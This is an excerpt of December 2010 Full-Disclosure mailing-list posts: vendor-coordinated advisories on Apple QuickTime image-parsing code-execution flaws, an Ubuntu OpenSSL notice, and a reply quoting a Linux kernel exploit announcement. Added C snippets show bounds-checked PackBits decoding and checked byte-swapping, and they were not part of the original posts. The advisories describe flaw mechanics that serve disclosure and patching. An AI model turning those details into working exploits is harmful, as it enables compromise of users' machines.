9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10654.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required in that a user must be coerced into opening up a malicious
document or visiting a malicious website.

The specific flaw exists within the way the application parses a
particular property out of a flashpix file. The application will
explicitly trust a field in the property as a length for a loop over an
array of data structures. If this field's value is larger than the
number of objects, the application will utilize objects outside of this
array. Successful exploitation can lead to code execution under the
context of the application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4447

-- Disclosure Timeline:
2010-06-01 - Vulnerability reported to vendor
2010-12-07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put




[Full-disclosure] ZDI-10-260: Apple QuickTime Panorama Atom Remote Code Execution Vulnerability

2010-12-07 Thread ZDI Disclosures
ZDI-10-260: Apple QuickTime Panorama Atom Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-260

December 7, 2010

-- CVE ID:
CVE-2010-3802

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that a user must be coerced
into visiting a malicious page or opening a malicious file.

The specific flaw exists within Apple's support for Panoramic Images and
occurs due to the application trusting a particular field for
calculation of an offset. Due to the field being treated as a signed
integer, the calculated offset can result in a pointer outside the
bounds of the expected buffer. Upon usage of this out-of-bounds pointer,
the application will proceed to write image data to the invalid
location. Successful exploitation can lead to code execution under the
context of the application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4447

-- Disclosure Timeline:
2010-03-22 - Vulnerability reported to vendor
2010-12-07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-10-261: Apple QuickTime PICT File PackBits Remote Code Execution Vulnerability

2010-12-07 Thread ZDI Disclosures
ZDI-10-261: Apple QuickTime PICT File PackBits Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-261

December 7, 2010

-- CVE ID:
CVE-2010-3800

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the application's implementation of a
custom compression algorithm. The application will trust a field within
a DirectBitsRect structure which is used for an allocation, and later
attempt to decompress data into this buffer. Because the value used for
the allocation differs from the length of the data being decompressed, a
buffer overflow occurs, which can lead to code execution with the
privileges of the application.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4447

-- Disclosure Timeline:
2010-06-01 - Vulnerability reported to vendor
2010-12-07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put
* Procyun
* Andrzej Dyjak


[Full-disclosure] ZDI-10-262: Apple QuickTime PICT directBitsRect Pack3 Remote Code Execution Vulnerability

2010-12-07 Thread ZDI Disclosures
ZDI-10-262: Apple QuickTime PICT directBitsRect Pack3 Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-262

December 7, 2010

-- CVE ID:
CVE-2010-3800

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10661.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple Quicktime. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within how the application parses
directBitsRect records within a .pict file. When decompressing data
within this structure, the application will allocate space for the
target buffer using fields described within the file and then use a
different length to decompress the total data from the file. This can
lead to code execution under the context of the application.
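
ZDI-10-261 and ZDI-10-262 describe the same defect class: the target buffer is sized from a header field, while the packed data is decoded to a length that is never compared with that size. As an added illustration (not Apple's or ZDI's code), here is a PackBits run-length decoder that treats the allocated capacity as a hard limit; the sample record is constructed and the function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added illustration, not Apple's or ZDI's code. Apple PackBits, as used
 * for PICT pixel rows: a header byte n, 0..127 => copy the next n+1 bytes
 * literally, -1..-127 => repeat the next byte 1-n times, -128 => no-op. */

/* Decode packed data into 'out', whose capacity out_cap is the size the
 * image header led the caller to allocate. Returns the number of bytes
 * written, or -1 if the packed data would expand past out_cap or runs off
 * the end of 'in'. The vulnerable pattern decodes until 'in' is exhausted
 * and never compares the running output length with the allocation. */
long packbits_decode(const uint8_t *in, size_t in_len,
                     uint8_t *out, size_t out_cap)
{
    size_t ip = 0, op = 0;
    while (ip < in_len) {
        int8_t n = (int8_t)in[ip++];
        if (n >= 0) {                            /* literal run */
            size_t len = (size_t)n + 1;
            if (len > in_len - ip || len > out_cap - op)
                return -1;                       /* would overflow */
            memcpy(out + op, in + ip, len);
            ip += len;
            op += len;
        } else if (n != -128) {                  /* repeat run */
            size_t len = (size_t)(1 - (int)n);
            if (ip >= in_len || len > out_cap - op)
                return -1;                       /* would overflow */
            memset(out + op, in[ip++], len);
            op += len;
        }                                        /* -128: skip */
    }
    return (long)op;
}

/* Constructed sample record: the header claims a 4-byte row, but the
 * packed data expands to 6 bytes (0xFD = -3 -> four copies of 0xAA, then
 * 0x01 -> the two literals 0xBB 0xCC). */
static const uint8_t sample_packed[] = {0xFD, 0xAA, 0x01, 0xBB, 0xCC};
static const uint16_t sample_row_bytes = 4;

/* Decode the sample into a row buffer of 'cap' bytes. With cap taken from
 * the header (sample_row_bytes) the mismatch is caught and -1 returned
 * instead of two bytes landing past the allocation. */
long decode_sample_row(uint8_t *row, size_t cap)
{
    return packbits_decode(sample_packed, sizeof sample_packed, row, cap);
}
```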

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:

http://support.apple.com/kb/HT4447

-- Disclosure Timeline:
2010-11-05 - Vulnerability reported to vendor
2010-12-07 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Moritz Jodeit of n.runs AG


[Full-disclosure] iDefense Security Advisory 12.07.10: Apple QuickTime PICT Memory Corruption Vulnerability

2010-12-07 Thread labs-no-reply
iDefense Security Advisory 12.07.10
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 07, 2010

I. BACKGROUND

QuickTime is Apple's media player product used to render video and other
media. The PICT file format was developed by Apple Inc. in 1984. PICT
files can contain both object-oriented images and bitmaps. For more
information visit http://www.apple.com/quicktime/

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Apple Inc.'s
QuickTime media player could allow attackers to execute arbitrary code
in the context of the targeted user.

The vulnerability specifically exists in the way specially crafted PICT
image files are handled by the QuickTime PictureViewer.

When processing specially crafted PICT image files, QuickTime
PictureViewer uses a value taken from the file to control the length of a
byte swap operation. The byte swap operation converts big-endian data to
little-endian data. QuickTime fails to validate the length value properly
before using it. When the length value is larger than the actual buffer
size supplied, the operation corrupts heap memory beyond the allocated
buffer, which could lead to an exploitable condition.
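
The unchecked byte-swap length described here and the signed offset field in the Panoramic-image advisory above are the same missing check: a file-supplied field is turned into a pointer or a loop bound before it is compared with the allocation. As an added illustration in C (not Apple's, ZDI's or iDefense's code), the record layout, the 16-bit word width of the swap and the function names are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Added illustration, not Apple's, ZDI's or iDefense's code. A PICT-style
 * record is assumed to carry a signed 32-bit offset into the pixel buffer
 * and a 16-bit count of big-endian 16-bit words to byte-swap in place;
 * both come straight from the file, so both are attacker-controlled. */

/* True only if the 'count' words starting at 'offset' lie inside a buffer
 * of buf_len bytes. The offset keeps the signedness the file gives it and
 * a negative value is rejected outright (the Panoramic-image flaw turned
 * such a value into a pointer before the buffer). The remaining
 * arithmetic is done in size_t after that check, so it cannot wrap. */
bool region_in_bounds(size_t buf_len, int32_t offset, uint16_t count)
{
    if (offset < 0)
        return false;
    size_t off = (size_t)offset;
    if (off > buf_len)
        return false;
    return (size_t)count * 2u <= buf_len - off;
}

/* Swap 'count' 16-bit words at 'offset' in place, the big-endian to
 * little-endian step the iDefense advisory describes. The vulnerable
 * pattern trusts 'count' and runs past the heap allocation; here the
 * check comes first and a bad record leaves the buffer untouched.
 * Returns 0 on success, -1 when the record is rejected. */
int swap16_checked(uint8_t *buf, size_t buf_len, int32_t offset, uint16_t count)
{
    if (!region_in_bounds(buf_len, offset, count))
        return -1;
    uint8_t *p = buf + offset;
    for (size_t i = 0; i < count; i++, p += 2) {
        uint8_t t = p[0];
        p[0] = p[1];
        p[1] = t;
    }
    return 0;
}
```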

III. ANALYSIS

Successful exploitation could allow attackers to execute arbitrary code
in the context of the current user. To exploit this vulnerability, an
attacker must persuade a victim into using QuickTime to open a
specially crafted PICT picture file. This could be accomplished by a
direct link or by referencing the file from a website under the
attacker's control. An attacker could host a Web page containing a
malformed PICT file; upon visiting the malicious Web page, exploitation
would occur and execution of arbitrary code would be possible.
Alternatively, a PICT file could be attached to an e-mail message.

IV. DETECTION

QuickTime Player versions prior to 7.6.9 are vulnerable.

V. WORKAROUND

iDefense recommends disabling the QuickTime Plugin and altering the
.pct, .pic and .pict filetype associations within the registry.
Disabling the plugin will prevent Web browsers from utilizing QuickTime
Player to view associated media files. Removing the filetype
associations within the registry will prevent QuickTime Player and
Picture Viewer from opening .pct, .pic and .pict files.

VI. VENDOR RESPONSE

Apple Inc. has released patches which address this issue. For more
information, consult their advisory at the following URL:

http://support.apple.com/kb/HT4447

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-3800 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/31/2010  Initial Vendor Notification
03/31/2010  Initial Vendor Reply
12/07/2010  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Hossein Lotfi (s0lute).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.



[Full-disclosure] [USN-1029-1] OpenSSL vulnerabilities

2010-12-07 Thread Steve Beattie
===
Ubuntu Security Notice USN-1029-1 December 08, 2010
openssl vulnerabilities
CVE-2008-7270, CVE-2010-4180
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libssl0.9.8 0.9.8a-7ubuntu0.14

Ubuntu 8.04 LTS:
  libssl0.9.8 0.9.8g-4ubuntu3.13

Ubuntu 9.10:
  libssl0.9.8 0.9.8g-16ubuntu3.5

Ubuntu 10.04 LTS:
  libssl0.9.8 0.9.8k-7ubuntu8.5

Ubuntu 10.10:
  libssl0.9.8 0.9.8o-1ubuntu4.3

After a standard system update you need to reboot your computer to make
all the necessary changes.

Details follow:

It was discovered that an old bug workaround in the SSL/TLS
server code allowed an attacker to modify the stored session cache
ciphersuite. This could possibly allow an attacker to downgrade the
ciphersuite to a weaker one on subsequent connections. (CVE-2010-4180)

It was discovered that an old bug workaround in the SSL/TLS server
code allowed an attacker to modify the stored session cache
ciphersuite. An attacker could possibly take advantage of this to
force the use of a disabled cipher. This vulnerability only affects
the versions of OpenSSL in Ubuntu 6.06 LTS, Ubuntu 8.04 LTS, and
Ubuntu 9.10. (CVE-2008-7270)


Updated packages for Ubuntu 6.06 LTS:


Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Rem7ter
Why does gcc exp.c -o exp alert "Error: too many Argument"?  I tested it on
Linux 2.6.X.

2010/12/7 coderman 

> On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
>  wrote:
> > ... I've included here a proof-of-concept local privilege escalation exploit...
> >  * This exploit leverages three vulnerabilities to get root, all of which were
> >  * discovered by Nelson Elhage:
> >...
> >  * However, the important issue, CVE-2010-4258, affects everyone, and it would
> >  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
> >  * more sophisticated version of this...
>
> nice :)
>
> clearly demonstrates why risk is complicated and seemingly minor
> defects (worth delaying patches for weeks/months? ;) can combine into
> truly ugly vulnerabilities...
>